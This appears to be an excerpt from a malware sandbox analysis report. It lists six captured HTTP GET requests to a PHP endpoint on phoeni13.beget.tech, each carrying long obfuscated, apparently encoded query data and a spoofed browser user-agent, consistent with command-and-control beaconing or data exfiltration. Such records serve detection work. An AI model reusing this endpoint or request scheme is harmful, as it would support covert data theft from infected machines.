Source: global traffic	HTTP traffic detected: GET /19bd75f9.php?Dqk1RxxsMic=WB03Lj3Jl0wyHeC69XJobc5AEC9&1AEXzLSWm6uLx=rM4vu&u0tyZxa3GzzJjfRlwY95MqTCn=1TusFTSMmAQQ7BuYQwHklR0GafwylEg&3f032fcade01e4b9f042d13e86634631=QZzQWYzYWZiBTYyImN4ADMlZmNzgjZ2ITNwQDO0MWN4YzMmZ2YwkjN3ETOwQDM4YTM0gDN2YDN&365174fb29f58fe307a28d17c1f20f9c=gYhlTOiNDZiVzMjRzNxUWYiZDM2YjN1YWMmZGZ2QWO2UmMmRGO5M2M&4bb748b03ddc22e891199067c0479300=d1nIlZWMjZDOxIDZkBzNhZGMxMGMyEWN1YzYzADZwQGMlFjZ5cjYiNmYlJiOiIjZ4QmN4UDNwI2MmZjMkhDN2UWZhJmN1UDOxEmZzUGOiwiIhJWZiNGZmFjMxADNlNmZ4gzN4EWZ5kTNzMmZ4YTNwkjMzEWN5gzYwIiOiAjNyIjN3EWNjlTNyY2NwgjNldDOyYWM5AzNmZjNmdzYis3W&2cab15acb9861112e256b821d78413ec=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 HTTP/1.1Accept: /Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: phoeni13.beget.techConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /19bd75f9.php?Dqk1RxxsMic=WB03Lj3Jl0wyHeC69XJobc5AEC9&1AEXzLSWm6uLx=rM4vu&u0tyZxa3GzzJjfRlwY95MqTCn=1TusFTSMmAQQ7BuYQwHklR0GafwylEg&3f032fcade01e4b9f042d13e86634631=QZzQWYzYWZiBTYyImN4ADMlZmNzgjZ2ITNwQDO0MWN4YzMmZ2YwkjN3ETOwQDM4YTM0gDN2YDN&365174fb29f58fe307a28d17c1f20f9c=gYhlTOiNDZiVzMjRzNxUWYiZDM2YjN1YWMmZGZ2QWO2UmMmRGO5M2M&4bb748b03ddc22e891199067c0479300=d1nIlZWMjZDOxIDZkBzNhZGMxMGMyEWN1YzYzADZwQGMlFjZ5cjYiNmYlJiOiIjZ4QmN4UDNwI2MmZjMkhDN2UWZhJmN1UDOxEmZzUGOiwiIhJWZiNGZmFjMxADNlNmZ4gzN4EWZ5kTNzMmZ4YTNwkjMzEWN5gzYwIiOiAjNyIjN3EWNjlTNyY2NwgjNldDOyYWM5AzNmZjNmdzYis3W&2cab15acb9861112e256b821d78413ec=QX9JiI6IyNjJjN3Q2NxUTY3YzM2UmYhJDNzIWYhNDO3YTNhRWZwICLiUmZxMmN4EjMkRGM3EmZwEzYwITY1UjNjNDMkBDZwUWMmlzNiJ2YiVmI6IiMmhDZ2gTN0AjYzYmNyQGO0YTZlFmY2UTN4ETYmNTZ4ICLiEmYlJ2YkZWMyEDM0U2YmhDO3gTYllTO1MzYmhjN1ATOyMTY1kDOjBjI6ICM2IjM2cTY1MWO1IjZ3ADO2U2N4IjZxkDM3YmN2Y2NjJyes0nI5EjbJdXQq9kMNp2T4lkaJZTSpplMjpnTwcGVahXV65UMNpmTq5EVPFTVtl1aKdVTwkFRPtGZE9EakRkWop0VZlmRXpVbSJTTpdXaJxWQ61UavpWS1EEVNJzaqlVeFRkWopleONTSU1UNRRVTwEFVaBzYE9keNpXT3llaapmTE1EMBpnT5VkaadXSDxUaVNUTp9maJtmWE9UbCpWWyUkaZhmRX1EbGR1TxkkMZxmVq1EboRUT3VkaOFzY6lFbCRVWwU0VPlmStplMJNETpV1QNdXRqlkNJNUTxEFVNJTWE5kMFR1TrJleNdXStpleZpmWwcGVORTUX9kaGpmWwEEVZhmWt5EbWpmT0UleNl2dpl0LJl2TpFlaZNTVtllaWdVTqZleNJTQ650asRVTqp0RP1mUH5kMZJTT41EValXVU10MZRVT0k1RPNzZql0cJNUTp9maJlmUq5kakRVWpZ1VatmQEpFbadVW410RPBTWqplMnRVWpZUbNlXUX9UeJpWWxMGVZRTRUpVaKlXZ2k0UZBjRHJFMohlWpd3UOZTSDRWM5clW0x2RWdnVXp1cOxWSzlUeaVHbHNGbWdkYUpUaPlWTYRGMGdEZUxGSkBnWYFGMOdVUpdXaJlnVyoFa1cVWOJ0UihmSzoldKhUVp9maJNTOHpVdsJjVV5UVRl2dpl0TKl2TpBzVZpmSXpFWOhVYpdXaJplSp9UaV1mY2h2RjZnSzkFcxAzYwp0QMl2aD90Zj1mYwJESjxmUzU1ZNRkT4F0QixmUyImTClmTntGSiBXMXl1RCNkTyc3VaBTNXN1bBlWZJRWRJdXUqxUeBNUUnFERNJTWElkVCFTUnlEVL5kUGtEbKNjYEJ0ULNFaDJGbS5mYKpUaPlWVXJGa1UlVR50aJNXSTt0QkVUS4d2QJVlUsZVUaxWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWS0kFRNdHND50MwMET6lEVNNDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUNnRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETp1kaNVTS61UNJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiczYyYzNkdTM1E2N2MjNlJWYyQzMiFWYzgzN2UTYkVGMiwiI2MmYlFDOiR2NwEzN5UjM3MTZxIDM4kzNlNzM1QDOyYzM1EmZyMWOxIiOiIjZ4QmN4UDNwI2MmZjMkhDN2UWZhJmN1UDOxEmZzUGOiwiIhJWZiNGZmFjMxADNlNmZ4gzN4EWZ5kTNzMmZ4YTNwkjMzEWN5gzYwIiOiAjNyIjN3EWNjlTNyY2NwgjNldDOyYWM5AzNmZjNmdzYis3W HTTP/1.1Accept: /Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: phoeni13.beget.tech
Source: global traffic	HTTP traffic detected: GET /19bd75f9.php?Dqk1RxxsMic=WB03Lj3Jl0wyHeC69XJobc5AEC9&1AEXzLSWm6uLx=rM4vu&u0tyZxa3GzzJjfRlwY95MqTCn=1TusFTSMmAQQ7BuYQwHklR0GafwylEg&3f032fcade01e4b9f042d13e86634631=QZzQWYzYWZiBTYyImN4ADMlZmNzgjZ2ITNwQDO0MWN4YzMmZ2YwkjN3ETOwQDM4YTM0gDN2YDN&365174fb29f58fe307a28d17c1f20f9c=gYhlTOiNDZiVzMjRzNxUWYiZDM2YjN1YWMmZGZ2QWO2UmMmRGO5M2M&4bb748b03ddc22e891199067c0479300=d1nIlZWMjZDOxIDZkBzNhZGMxMGMyEWN1YzYzADZwQGMlFjZ5cjYiNmYlJiOiIjZ4QmN4UDNwI2MmZjMkhDN2UWZhJmN1UDOxEmZzUGOiwiIhJWZiNGZmFjMxADNlNmZ4gzN4EWZ5kTNzMmZ4YTNwkjMzEWN5gzYwIiOiAjNyIjN3EWNjlTNyY2NwgjNldDOyYWM5AzNmZjNmdzYis3W&2cab15acb9861112e256b821d78413ec=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 HTTP/1.1Accept: /Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: phoeni13.beget.techConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /19bd75f9.php?Dqk1RxxsMic=WB03Lj3Jl0wyHeC69XJobc5AEC9&1AEXzLSWm6uLx=rM4vu&u0tyZxa3GzzJjfRlwY95MqTCn=1TusFTSMmAQQ7BuYQwHklR0GafwylEg&3f032fcade01e4b9f042d13e86634631=QZzQWYzYWZiBTYyImN4ADMlZmNzgjZ2ITNwQDO0MWN4YzMmZ2YwkjN3ETOwQDM4YTM0gDN2YDN&365174fb29f58fe307a28d17c1f20f9c=gYhlTOiNDZiVzMjRzNxUWYiZDM2YjN1YWMmZGZ2QWO2UmMmRGO5M2M&4bb748b03ddc22e891199067c0479300=d1nIlZWMjZDOxIDZkBzNhZGMxMGMyEWN1YzYzADZwQGMlFjZ5cjYiNmYlJiOiIjZ4QmN4UDNwI2MmZjMkhDN2UWZhJmN1UDOxEmZzUGOiwiIhJWZiNGZmFjMxADNlNmZ4gzN4EWZ5kTNzMmZ4YTNwkjMzEWN5gzYwIiOiAjNyIjN3EWNjlTNyY2NwgjNldDOyYWM5AzNmZjNmdzYis3W&2cab15acb9861112e256b821d78413ec=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 HTTP/1.1Accept: /Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: phoeni13.beget.techConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /19bd75f9.php?Dqk1RxxsMic=WB03Lj3Jl0wyHeC69XJobc5AEC9&1AEXzLSWm6uLx=rM4vu&u0tyZxa3GzzJjfRlwY95MqTCn=1TusFTSMmAQQ7BuYQwHklR0GafwylEg&3f032fcade01e4b9f042d13e86634631=QZzQWYzYWZiBTYyImN4ADMlZmNzgjZ2ITNwQDO0MWN4YzMmZ2YwkjN3ETOwQDM4YTM0gDN2YDN&365174fb29f58fe307a28d17c1f20f9c=gYhlTOiNDZiVzMjRzNxUWYiZDM2YjN1YWMmZGZ2QWO2UmMmRGO5M2M&4bb748b03ddc22e891199067c0479300=d1nIlZWMjZDOxIDZkBzNhZGMxMGMyEWN1YzYzADZwQGMlFjZ5cjYiNmYlJiOiIjZ4QmN4UDNwI2MmZjMkhDN2UWZhJmN1UDOxEmZzUGOiwiIhJWZiNGZmFjMxADNlNmZ4gzN4EWZ5kTNzMmZ4YTNwkjMzEWN5gzYwIiOiAjNyIjN3EWNjlTNyY2NwgjNldDOyYWM5AzNmZjNmdzYis3W&2cab15acb9861112e256b821d78413ec=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 HTTP/1.1Accept: /Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: phoeni13.beget.tech
Source: global traffic	HTTP traffic detected: GET /19bd75f9.php?Dqk1RxxsMic=WB03Lj3Jl0wyHeC69XJobc5AEC9&1AEXzLSWm6uLx=rM4vu&u0tyZxa3GzzJjfRlwY95MqTCn=1TusFTSMmAQQ7BuYQwHklR0GafwylEg&3f032fcade01e4b9f042d13e86634631=QZzQWYzYWZiBTYyImN4ADMlZmNzgjZ2ITNwQDO0MWN4YzMmZ2YwkjN3ETOwQDM4YTM0gDN2YDN&365174fb29f58fe307a28d17c1f20f9c=gYhlTOiNDZiVzMjRzNxUWYiZDM2YjN1YWMmZGZ2QWO2UmMmRGO5M2M&4bb748b03ddc22e891199067c0479300=d1nIlZWMjZDOxIDZkBzNhZGMxMGMyEWN1YzYzADZwQGMlFjZ5cjYiNmYlJiOiIjZ4QmN4UDNwI2MmZjMkhDN2UWZhJmN1UDOxEmZzUGOiwiIhJWZiNGZmFjMxADNlNmZ4gzN4EWZ5kTNzMmZ4YTNwkjMzEWN5gzYwIiOiAjNyIjN3EWNjlTNyY2NwgjNldDOyYWM5AzNmZjNmdzYis3W&2cab15acb9861112e256b821d78413ec=0VfiIiOiczYyYzNkdTM1E2N2MjNlJWYyQzMiFWYzgzN2UTYkVGMiwiIlZWMjZDOxIDZkBzNhZGMxMGMyEWN1YzYzADZwQGMlFjZ5cjYiNmYlJiOiIjZ4QmN4UDNwI2MmZjMkhDN2UWZhJmN1UDOxEmZzUGOiwiIhJWZiNGZmFjMxADNlNmZ4gzN4EWZ5kTNzMmZ4YTNwkjMzEWN5gzYwIiOiAjNyIjN3EWNjlTNyY2NwgjNldDOyYWM5AzNmZjNmdzYisHL9JSOx4WSyEkaPpXSq9ENBpWS2kUaaJzY65EMnRlW4VleOFTTq5kaOR1TxUVbZtmSX1EMZR0TrRGRPhGZEpFaKdVWpZ0Va1mUy0Ua3lWSsFkeNl2bqlUNBRVTysmaZlXREpFaapnTzkEVNVTUU1EMRRlWwMGRPpXT610dZpmWq5ERNBTQ65UeFpmW3l0QMlWVD1UavpWSrpFRP1mQqllMFpWWoZ0VNxmRU9UMJJTWsZlaNxGaE10dFpmTxMmeZxmQUlFMFd1TppUbaJTSDxUaVNUT3VkaJZTSD1UMRRVTykFROJTRU90aSpXT3lUbapXWqpFMnRlT0E1VPpmRqpFMBRVWopVbOxmVq5ENVpXTpdXaJ9SSp9UaRpWWzUVbZpmVX1kaWpXTyEkeOtGbU1kaKd0TtJ1ROJTWy0EeNRlW5VFVNNTWU1ENZd0TzcmaJNXSD1UavpWSpJlaOpGZUlVaWdlWrJERaxmWXlFeNd0TwklaaJzZUlVaG1WT5F1VPlXSqlVMjRVW0UEValmS5VmNJNVWwY0RSBDaYpVa3NlT2k0QkFTOXpFdsdkV3Z1VaNnTsl0cJlnW1x2RjxmVHJGVKl2Tp1EWkBjRHRGVshEZwpFWhBjTXFVa3lWSp9maJNTOHpVdsJjVV5UVRl2dpl0TKl2TpBzVZpmSXpFWOhVYpdXaJplSp9UaV1mY2h2RjZnSzkFcxAzYwp0QMl2aD90Zj1mYwJESjxmUzU1ZNRkT4F0QixmUyImTClmTntGS